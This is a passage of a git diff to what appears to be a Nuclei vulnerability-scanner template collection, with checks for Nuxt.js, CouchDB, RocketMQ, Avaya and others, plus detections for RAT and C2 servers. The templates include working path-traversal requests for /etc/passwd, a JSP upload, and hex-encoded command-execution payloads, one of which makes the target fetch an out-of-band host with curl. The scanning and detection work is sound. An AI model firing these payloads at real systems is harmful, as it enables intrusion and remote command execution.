metadata: max-request: 1 diff --git a/http/token-spray/api-zoomeye.yaml b/http/token-spray/api-zoomeye.yaml index adee91a144..81a529a47e 100644 --- a/http/token-spray/api-zoomeye.yaml +++ b/http/token-spray/api-zoomeye.yaml @@ -9,7 +9,7 @@ info: reference: - https://zoomeye.org - https://zoomeye.org/doc - tags: dns,scan,recon,zoomeye,token-spray + tags: recon,zoomeye,token-spray metadata: max-request: 1 diff --git a/http/vulnerabilities/avaya/avaya-aura-rce.yaml b/http/vulnerabilities/avaya/avaya-aura-rce.yaml index 9b6bc8562d..9b7de4b927 100644 --- a/http/vulnerabilities/avaya/avaya-aura-rce.yaml +++ b/http/vulnerabilities/avaya/avaya-aura-rce.yaml @@ -4,7 +4,8 @@ info: name: Avaya Aura Utility Services Administration - Remote Code Execution author: DhiyaneshDk severity: critical - description: Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + description: | + Avaya Aura Utility Services Administration is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/ - https://download.avaya.com/css/public/documents/101076366 @@ -26,7 +27,7 @@ http: User-Agent: AVAYA Connection: close - ' + +http: + - raw: + - | + POST /eps/resourceOperations/upload.action HTTP/1.1 + Host: {{Hostname}} + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + Content-Type: image/jpeg + + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + + - | + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: res_id + json: + - ".data.resourceUuid" + internal: true + + matchers: + - type: dsl + dsl: + - body_2 == str2 \ No newline at end of file diff --git a/http/vulnerabilities/jenkins/jenkins-script.yaml b/http/vulnerabilities/jenkins/jenkins-script.yaml index e4b0909e37..1dc407c2ee 100644 --- a/http/vulnerabilities/jenkins/jenkins-script.yaml +++ b/http/vulnerabilities/jenkins/jenkins-script.yaml @@ -2,25 +2,28 @@ id: jenkins-script info: name: Jenkins - Remote Code Execution - author: philippedelteil + author: philippedelteil,DhiyaneshDK severity: critical description: | Jenkins is susceptible to a remote code execution vulnerability due to accessible script functionality. reference: - https://hackerone.com/reports/403402 + - https://medium.com/@gokulsspace/the-30000-bounty-affair-3f025ee6b834 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: devops,hackerone,jenkins,rce metadata: - max-request: 1 + max-request: 2 + tags: devops,hackerone,jenkins,rce http: - method: GET path: - "{{BaseURL}}/script/" + - "{{BaseURL}}/jenkins/script" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -38,5 +41,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/05/26 diff --git a/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml b/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml index caf4c5f5eb..01aab30b4f 100644 --- a/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml +++ b/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml @@ -12,7 +12,7 @@ info: cvss-score: 8.6 cwe-id: CWE-22 remediation: Upgrade to a supported version. - tags: cve,cve2010,joomla,lfi,edb + tags: joomla,lfi,edb metadata: max-request: 1 diff --git a/http/vulnerabilities/magento/magento-2-exposed-api.yaml b/http/vulnerabilities/magento/magento-2-exposed-api.yaml index e594a7b1d3..5ae4b3837e 100644 --- a/http/vulnerabilities/magento/magento-2-exposed-api.yaml +++ b/http/vulnerabilities/magento/magento-2-exposed-api.yaml @@ -26,14 +26,14 @@ http: - 'contains(body, "searchCriteria")' - 'contains(body, "parameters")' - 'contains(body, "message")' - - 'contains(tolower(all_headers), "application/json")' + - 'contains(tolower(header), "application/json")' condition: and - type: dsl dsl: - 'contains(body, "secure_base_link_url")' - 'contains(body, "timezone")' - - 'contains(tolower(all_headers), "application/json")' + - 'contains(tolower(header), "application/json")' - 'status_code == 200' condition: and @@ -41,6 +41,6 @@ http: dsl: - 'contains(body, "name")' - 'contains(body, "website_id")' - - 'contains(tolower(all_headers), "application/json")' + - 'contains(tolower(header), "application/json")' - 'status_code == 200' condition: and \ No newline at end of file diff --git a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml index 1f8f2880b6..ad4a3abd5f 100644 --- a/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml +++ b/http/vulnerabilities/magento/magento-unprotected-dev-files.yaml @@ -26,7 +26,7 @@ http: - 'contains(body, "Magento")' - 'contains(body, "replace xmlns:xsi=")' - 'contains(body, "")' - 'contains(body, "")' - - 'contains(tolower(all_headers), "application/xml") || contains(tolower(all_headers), "application/octet-stream")' + - 'contains(tolower(header), "application/xml") || contains(tolower(header), "application/octet-stream")' - 'status_code == 200' condition: and \ No newline at end of file diff --git a/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml new file mode 100644 index 0000000000..adbf12107c --- /dev/null +++ b/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml @@ -0,0 +1,32 @@ +id: nuxt-js-lfi + +info: + name: Arbitrary File Read in Dev Mode - Nuxt.js + author: DhiyaneshDK + severity: high + description: | + Vite is misconfigured within nuxt to permit any file to be retrieved from the file system. + reference: + - https://huntr.dev/bounties/4849af83-450c-435e-bc0b-71705f5be440/ + - https://bryces.io/blog/nuxt3 + - https://twitter.com/fofabot/status/1669339995780558849 + metadata: + fofa-query: body="buildAssetsDir" && body="__nuxt" + max-request: 2 + shodan-query: html:"buildAssetsDir" "nuxt" + verified: "true" + tags: lfi,nuxtjs + +http: + - method: GET + path: + - "{{BaseURL}}/_nuxt/@fs/etc/passwd" + - "{{BaseURL}}/_nuxt/@fs/windows/win.ini" + + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or diff --git a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml new file mode 100644 index 0000000000..64b571c09d --- /dev/null +++ b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml @@ -0,0 +1,37 @@ +id: nuxt-js-semi-lfi + +info: + name: Semi Arbitrary File Read in Dev Mode - Nuxt.js + author: DhiyaneshDK + severity: medium + reference: + - https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/ + - https://bryces.io/blog/nuxt3 + - https://twitter.com/fofabot/status/1669339995780558849 + metadata: + fofa-query: body="buildAssetsDir" && body="__nuxt" + max-request: 2 + shodan-query: html:"buildAssetsDir" "nuxt" + verified: "true" + tags: lfi,nuxtjs + +http: + - method: GET + path: + - "{{BaseURL}}/__nuxt_vite_node__/module//bin/passwd" + - "{{BaseURL}}/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"plugin":' + - '"pluginCode":' + - '"id":' + condition: and + + - type: word + part: header + words: + - "application/json" diff --git a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml new file mode 100644 index 0000000000..8864031fbb --- /dev/null +++ b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml @@ -0,0 +1,37 @@ +id: nuxt-js-xss + +info: + name: Error Page XSS - Nuxt.js + author: DhiyaneshDK + severity: medium + description: | + The developer server unsafely renders the stack trace within errors. This can be manipulated by sending a specially crafted request. + reference: + - https://huntr.dev/bounties/70ac720d-c932-4ed3-98b1-dd2cbcb90185/ + - https://bryces.io/blog/nuxt3 + - https://twitter.com/fofabot/status/1669339995780558849 + metadata: + max-request: 1 + shodan-query: html:"buildAssetsDir" "nuxt" + fofa-query: body="buildAssetsDir" && body="__nuxt" + verified: "true" + tags: xss,nuxtjs,error + +http: + - method: GET + path: + - "{{BaseURL}}/__nuxt_error?stack=%0A" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "window.__NUXT__" + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/http/vulnerabilities/other/epp-server-lfi.yaml b/http/vulnerabilities/other/epp-server-lfi.yaml new file mode 100644 index 0000000000..90f7d942f2 --- /dev/null +++ b/http/vulnerabilities/other/epp-server-lfi.yaml @@ -0,0 +1,33 @@ +id: epp-server-lfi + +info: + name: EPP Server - Local File Inclusion + author: DhiyaneshDK + severity: high + description: | + servlet called "CitiesServlet" that handles HTTP GET requests, so the user-provided input, obtained from the country parameter, is directly concatenated with the "/cities/cities_" string to form the fileName, This means an attacker can manipulate the country parameter and potentially access arbitrary files on the server's file system + reference: + - https://hackcompute.com/hacking-epp-servers/ + metadata: + max-request: 1 + tags: epp,cocca,registry + +http: + - method: GET + path: + - "{{BaseURL}}/cities?country=/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/hospital-management-xss.yaml b/http/vulnerabilities/other/hospital-management-xss.yaml index 6f791baaa5..78e163f974 100644 --- a/http/vulnerabilities/other/hospital-management-xss.yaml +++ b/http/vulnerabilities/other/hospital-management-xss.yaml @@ -40,7 +40,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - "status_code_2 == 200" - contains(body_2, 'Result against \"\" keyword') condition: and diff --git a/http/vulnerabilities/other/hospital-management-xss2.yaml b/http/vulnerabilities/other/hospital-management-xss2.yaml index 43045e12f0..84b367db36 100644 --- a/http/vulnerabilities/other/hospital-management-xss2.yaml +++ b/http/vulnerabilities/other/hospital-management-xss2.yaml @@ -40,7 +40,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - "status_code_2 == 200" - contains(body_2, 'Result against \"\" keyword') condition: and diff --git a/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml b/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml index 0f2e7f2da8..bcef7bf77a 100644 --- a/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml +++ b/http/vulnerabilities/other/sponip-network-system-ping-rce.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: sponip,rce,oast,network + tags: sponip,rce,oast metadata: max-request: 1 @@ -30,6 +30,4 @@ http: part: interactsh_protocol name: http words: - - "http" - -# Enhanced by mp on 2022/05/30 + - "http" \ No newline at end of file diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index b241509b8d..4327f1b5d4 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -64,7 +64,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_2, 'text/html') && contains(all_headers_2, 'YesWiki')" + - "contains(header_2, 'text/html') && contains(header_2, 'YesWiki')" - "status_code_2 == 200" - contains(body_2, '>') condition: and diff --git a/http/vulnerabilities/other/zzcms-xss.yaml b/http/vulnerabilities/other/zzcms-xss.yaml index b738fc3137..0310f0dffd 100644 --- a/http/vulnerabilities/other/zzcms-xss.yaml +++ b/http/vulnerabilities/other/zzcms-xss.yaml @@ -34,7 +34,7 @@ http: matchers: - type: dsl dsl: - - "contains(all_headers_2, 'text/html')" + - "contains(header_2, 'text/html')" - "status_code_2 == 200" - 'contains(body_2, "参数 1\"+alert(document.domain)+")' condition: and diff --git a/http/vulnerabilities/vbulletin/arcade-php-sqli.yaml b/http/vulnerabilities/vbulletin/arcade-php-sqli.yaml new file mode 100644 index 0000000000..583ace20dd --- /dev/null +++ b/http/vulnerabilities/vbulletin/arcade-php-sqli.yaml @@ -0,0 +1,31 @@ +id: arcade-php-sqli + +info: + name: Arcade.php - SQL Injection + author: MaStErChO + severity: high + description: | + The arcade.php script is vulnerable to SQL injection. By exploiting this vulnerability, an attacker can manipulate the SQL queries executed by the script, potentially gaining unauthorized access to the database. + reference: + - https://www.exploit-db.com/exploits/29604 + - https://github.com/OWASP/vbscan/ + metadata: + max-request: 1 + verified: true + tags: arcade,php,vbulletin,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "mySQL query error" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml index 2d3a0c30db..52f24fe126 100644 --- a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml @@ -46,7 +46,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - "status_code_2 == 200" - "contains(body_2, '3DPrint-arbitrary-file-upload')" condition: and diff --git a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml index c8f9fde220..9ccfbce40f 100644 --- a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml +++ b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml @@ -32,6 +32,6 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "") && contains(body_2, "LDAP-authentication-intergrating-with-AD")' condition: and diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index bfe1897ded..488cc2690c 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -9,7 +9,7 @@ info: reference: - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py metadata: - max-request: 1 + max-request: 2 verified: true tags: cve,cve2016,weblogic,t3,rce,oast,deserialization,network verified: "true" @@ -26,6 +26,7 @@ tcp: host: - "{{Hostname}}" + - "{{Host}}:7001" read-size: 4 matchers: diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index b4cd70ff8e..c6b0a84e27 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2893 - tags: cve,cve2018,weblogic,network,deserialization,rce,oracle metadata: - max-request: 1 + max-request: 2 + tags: cve,cve2018,weblogic,network,deserialization,rce,oracle tcp: - inputs: @@ -36,6 +36,7 @@ tcp: host: - "{{Hostname}}" + - "{{Host}}:7001" matchers: - type: word diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index b8b483c5a5..ead3253e1c 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -18,7 +18,7 @@ info: max-request: 2 shodan-query: product:"redis" verified: true - tags: network,redis,unauth,apache,airflow,vulhub + tags: network,redis,unauth,apache,airflow,vulhub,intrusive variables: data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"" @@ -34,6 +34,7 @@ tcp: - "{{Hostname}}" - "{{Host}}:6379" + matchers-condition: and matchers: - type: word part: interactsh_protocol diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 165f72fb0d..a2777486ed 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-269 epss-score: 0.97493 metadata: - max-request: 2 + max-request: 4 shodan-query: title:"Apache Tomcat" tags: cisa,tenable,cve2020,apache,lfi,network,kev,cve,tomcat @@ -26,14 +26,13 @@ tcp: - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}" host: + - "{{Hostname}}" - "{{Hostname}}" - "{{Host}}:8009" - + - "{{Host}}:8009" read-size: 1024 matchers: - type: word words: - "See the NOTICE file distributed with" - -# Enhanced by mp on 2022/04/27 diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml new file mode 100644 index 0000000000..6963a27607 --- /dev/null +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-24706 + +info: + name: CouchDB Erlang Distribution - Remote Command Execution + author: Mzack9999,pussycat0x + severity: critical + description: | + In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. + reference: + - https://www.exploit-db.com/exploits/50914 + - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py + - https://nvd.nist.gov/vuln/detail/CVE-2022-24706 + metadata: + max-request: 2 + shodan-query: product:"CouchDB" + verified: "true" + tags: cve,cve2022,network,couch,rce + +variables: + name_msg: "00156e00050007499c4141414141414041414141414141" + challenge_reply: "00157201020304" + cookie: "monster" + cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572" + +tcp: + - inputs: + # auth + - data: "{{name_msg}}" + type: hex + read: 1024 + - read: 1024 + name: challenge + - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}" + type: hex + # rce + - data: "{{cmd}}" + type: hex + read: 1024 + host: + - "{{Hostname}}" + - "{{Host}}:9100" + matchers: + - type: word + part: raw + words: + - "uid" + - "gid" + - "groups" + condition: and diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml new file mode 100644 index 0000000000..2421314c7b --- /dev/null +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-33246 + +info: + name: RocketMQ <= 5.1.0 - Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x . + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-33246 + - https://github.com/I5N0rth/CVE-2023-33246 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-33246 + cwe-id: CWE-94 + cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* + epss-score: 0.00045 + metadata: + fofa-query: protocol="rocketmq" + max-request: 2 + shodan-query: title:"RocketMQ" + verified: true + tags: cve,cve2023,rocketmq,rce,oast,intrusive + +variables: + part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' + part_b: '{{ hex_decode("3b0a") }}' + +tcp: + - host: + - "{{Hostname}}" + - "{{Host}}:10911" + + inputs: + - data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}' + read: 1024 + read-size: 4 + + matchers: + - type: dsl + dsl: + - contains(raw,'serializeTypeCurrentRPC') + - contains(interactsh_protocol,'dns') + condition: and diff --git a/network/tidb-native-password.yaml b/network/tidb-native-password.yaml index 6dc8b475e2..2539c6e83c 100644 --- a/network/tidb-native-password.yaml +++ b/network/tidb-native-password.yaml @@ -3,7 +3,7 @@ id: tidb-native-password info: name: TiDB - Password Vulnerability author: lu4nx - severity: medium + severity: info description: TiDB queries with enabled native password support are susceptible to password brute-force attacks. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N diff --git a/http/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml similarity index 100% rename from http/vulnerabilities/other/clockwatch-enterprise-rce.yaml rename to network/vulnerabilities/clockwatch-enterprise-rce.yaml diff --git a/ssl/c2/asyncrat-c2.yaml b/ssl/c2/asyncrat-c2.yaml new file mode 100644 index 0000000000..dd0fbfa240 --- /dev/null +++ b/ssl/c2/asyncrat-c2.yaml @@ -0,0 +1,30 @@ +id: asyncrat-c2 + +info: + name: AsyncRAT C2 - Detect + author: johnk3r + severity: info + description: | + AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. + reference: | + https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat + metadata: + max-request: 1 + verified: "true" + shodan-query: ssl:"AsyncRAT Server" + censys-query: services.tls.certificates.leaf_data.issuer.common_name:AsyncRat + tags: c2,ir,osint,malware + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_cn + words: + - "AsyncRAT Server" + + extractors: + - type: json + json: + - " .issuer_cn" diff --git a/ssl/c2/bitrat-c2.yaml b/ssl/c2/bitrat-c2.yaml new file mode 100644 index 0000000000..bb6c6da9c5 --- /dev/null +++ b/ssl/c2/bitrat-c2.yaml @@ -0,0 +1,29 @@ +id: bitrat-c2 + +info: + name: Bitrat C2 - Detect + author: pussycat0x + severity: info + description: | + BitRAT is a fairly recent, notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums since Feb 2021. The RAT is particularly well known for its social media presence and functionality such as: Data exfiltration. Execution of payloads with bypasses. + reference: | + https://github.com/thehappydinoa/awesome-censys-queries#bitrat-- + metadata: + censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "BitRAT"' + max-request: 1 + verified: "true" + tags: c2,ir,osint,bitrat,ssl + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_cn + words: + - "BitRAT" + + extractors: + - type: json + json: + - ".issuer_cn" diff --git a/http/exposed-panels/c2/cobalt-strike-c2.yaml b/ssl/c2/cobalt-strike-c2.yaml similarity index 96% rename from http/exposed-panels/c2/cobalt-strike-c2.yaml rename to ssl/c2/cobalt-strike-c2.yaml index 21fb1efdb9..df481f70b8 100644 --- a/http/exposed-panels/c2/cobalt-strike-c2.yaml +++ b/ssl/c2/cobalt-strike-c2.yaml @@ -10,6 +10,7 @@ info: - https://blog.sekoia.io/hunting-and-detecting-cobalt-strike/ metadata: max-request: 1 + verified: "true" shodan-query: ssl.cert.serial:146473198 tags: ssl,c2,ir,osint,panel diff --git a/ssl/c2/covenant-c2-ssl.yaml b/ssl/c2/covenant-c2-ssl.yaml new file mode 100644 index 0000000000..064b894789 --- /dev/null +++ b/ssl/c2/covenant-c2-ssl.yaml @@ -0,0 +1,29 @@ +id: covenant-c2-ssl + +info: + name: Covenant C2 SSL - Detect + author: pussycat0x + severity: info + description: | + Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier,and serve as a collaborative command and control platform for red teamers. + reference: | + https://twitter.com/MichalKoczwara/status/1548685058403360770 + metadata: + max-request: 1 + shodan-query: ssl:”Covenant” http.component:”Blazor” + verified: "true" + tags: c2,ir,osint,covenant,ssl + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: subject_dn + words: + - "CN=Covenant" + + extractors: + - type: json + json: + - ".subject_dn" diff --git a/ssl/c2/dcrat-server-c2.yaml b/ssl/c2/dcrat-server-c2.yaml new file mode 100644 index 0000000000..00e05abb2e --- /dev/null +++ b/ssl/c2/dcrat-server-c2.yaml @@ -0,0 +1,29 @@ +id: dcrat-server-c2 + +info: + name: DcRat Server C2 - Detect + author: pussycat0x + severity: info + description: | + DCRat uses a modular framework that deploys separate executables for each module, most of which are compiled . net binaries programmed in C#. + reference: | + https://github.com/thehappydinoa/awesome-censys-queries#dcrat-- + metadata: + censys-query: 'services.tls.certificates.leaf_data.subject.common_name: "DcRat Server"' + max-request: 1 + verified: "true" + tags: c2,ir,osint,dcrat,ssl + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_cn + words: + - "DcRat Server" + + extractors: + - type: json + json: + - ".issuer_cn" diff --git a/ssl/c2/gozi-malware.yaml b/ssl/c2/gozi-malware.yaml new file mode 100644 index 0000000000..3737978cf4 --- /dev/null +++ b/ssl/c2/gozi-malware.yaml @@ -0,0 +1,29 @@ +id: gozi-malware + +info: + name: Gozi Malware - Detect + author: pussycat0x + severity: info + description: | + Gozi is a banking Trojan that has been modified to include new obfuscation techniques, to evade detection. Previous breaches involving Gozi in the healthcare sector led to the compromise of data associated with 3.7 million patients costing $5.55 million. + reference: | + https://github.com/thehappydinoa/awesome-censys-queries#gozi-malware-- + metadata: + censys-query: 'services.tls.certificates.leaf_data.issuer_dn: "C=XX, ST=1, L=1, O=1, OU=1, CN=\*"' + max-request: 1 + verified: "true" + tags: c2,ir,osint,gozi,malware,ssl + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: issuer_dn + words: + - "CN=*, OU=1, O=1, L=1, ST=1, C=XX" + + extractors: + - type: json + json: + - ".issuer_dn" diff --git a/ssl/c2/icedid.yaml b/ssl/c2/icedid.yaml new file mode 100644 index 0000000000..e7a8d4cced --- /dev/null +++ b/ssl/c2/icedid.yaml @@ -0,0 +1,27 @@ +id: icedid + +info: + name: IcedID Infrastructure - Detect + author: pussycat0x + severity: info + description: | + IcedID, also known as BokBot, is a modular banking trojan that targets user financial information and is capable of acting as a dropper for other malware. It uses a man-in-the-browser attack to steal financial information, including login credentials for online banking sessions. Once it successfully completes its initial attack, it uses the stolen information to take over banking accounts and automate fraudulent transactions. IcedID is primarily dropped as a secondary payload from other malware, most notably Emotet, in addition to its own malspam campaigns. IcedID uses multiple injection methods to evade antivirus and other malware detection methods, such as injecting itself into operating system (OS) memory and regular processes. The malware authors are known to update IcedID to increase persistence and evade new detection efforts. + metadata: + censys-query: CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd + max-request: 1 + verified: "true" + tags: c2,ir,osint,malware,bokbot,trojan + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: word + part: subject_dn + words: + - "O=Internet Widgits Pty Ltd, ST=Some-State, C=AU, CN=localhost" + + extractors: + - type: json + json: + - ".subject_dn" diff --git a/http/exposed-panels/c2/metasploit-c2.yaml b/ssl/c2/metasploit-c2.yaml similarity index 97% rename from http/exposed-panels/c2/metasploit-c2.yaml rename to ssl/c2/metasploit-c2.yaml index 93a905d05e..6f4a0f8e1d 100644 --- 